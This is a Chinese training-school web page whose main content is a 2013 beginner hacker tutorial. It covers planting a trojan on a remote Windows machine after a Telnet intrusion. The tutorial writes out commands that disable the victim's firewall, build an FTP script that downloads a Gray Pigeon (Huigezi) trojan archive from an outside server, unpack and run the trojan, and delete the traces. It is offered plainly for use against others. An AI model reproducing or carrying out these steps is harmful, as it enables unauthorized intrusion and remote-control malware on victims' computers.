你所在的位置: 首页 > 红帽认证 > RHCA >
最新开班 班级 报名状态
8月17日 RHCSA脱产班 已报满
10月13日 RHCE周末班 已报满
11月18日 RHCSA脱产班 已报满
11月2日 RHCSA周末班 已报满
12月2日 红帽专题班 已报满
12月16日 红帽专题班 已报满
12月23日 红帽专题班 已报满
3月03日 RHCSA脱产班 热招中
4月23日 RHCSA脱产班 热招中
7月24日 红帽RHCE暑假 热招中
  • 博赛网络ICT就业班热招中
  • 博赛推出Oracle OCM实战课程

解决Telnet入侵在FTP空间存放木马

时间:2013-09-30 14:42 作者:Superthink 点击:

本人菜鸟,不少菜鸟跟我一样,学了135端口扫描Administrator空口令,再利用Recton开启对方Telnet(23端口)进行入侵。

学了这个教程之后,找免费的FTP就很费劲了。我还中了一次毒,恢复了一次备分,现在流氓软件太多了,鄙视一下先。找到免费FTP后,还不让传EXE文件,别问我做没做免杀加没加壳,我随随便便上传个EXE都不让。这是FTP做了限制,不让你传马。 好了,言归正传,下面教大家几点小技巧,就是把马压缩起来传上去。

下面是某些教程里给的TXT说明,我整理后搬到这里来了,后面一段是我自己加上去的。

 

关闭防火墙 net stop sharedaccess
d:

1、echo open ftp.go1.icpcn.com>>tty.txt         登陆FTP服务器
2、echo guniao>>tty.txt                         用户名
3、echo 1234567>>tty.txt                        密码
4、echo bin>>tty.txt                            开始
5、echo get 123.rar>>tty.txt                    下载灰鸽子木马的压缩包
6、echo bye>>tty.txt                            关闭FTP服务器
 

输入上面命令后,在远程计算机上就会生成一个tty.txt文件,内容为:

 

open ftp.go1.icpcn.com
guniao
1234567
bin
get 123.rar
bye
 

现在我们在远程计算机上执行下面的命令:

 

ftp -s:tty.txt
 

意思是,读取tty.txt里的参数,执行ftp命令,命令执行完后,灰鸽子木马文件123.rar就下载到对方计算机里了。

 

del d:\tty.txt

c:
cd program files
cd winrar
winrar e d:123.rar d:
 

然后进到D盘下,执行一下自己的木马EXE文件,最后别忘记把压缩包和EXE文件给删除掉。

(责任编辑:Superthink)

评论列表(网友评论仅供网友表达个人看法,并不表明本站同意其观点或证实其描述)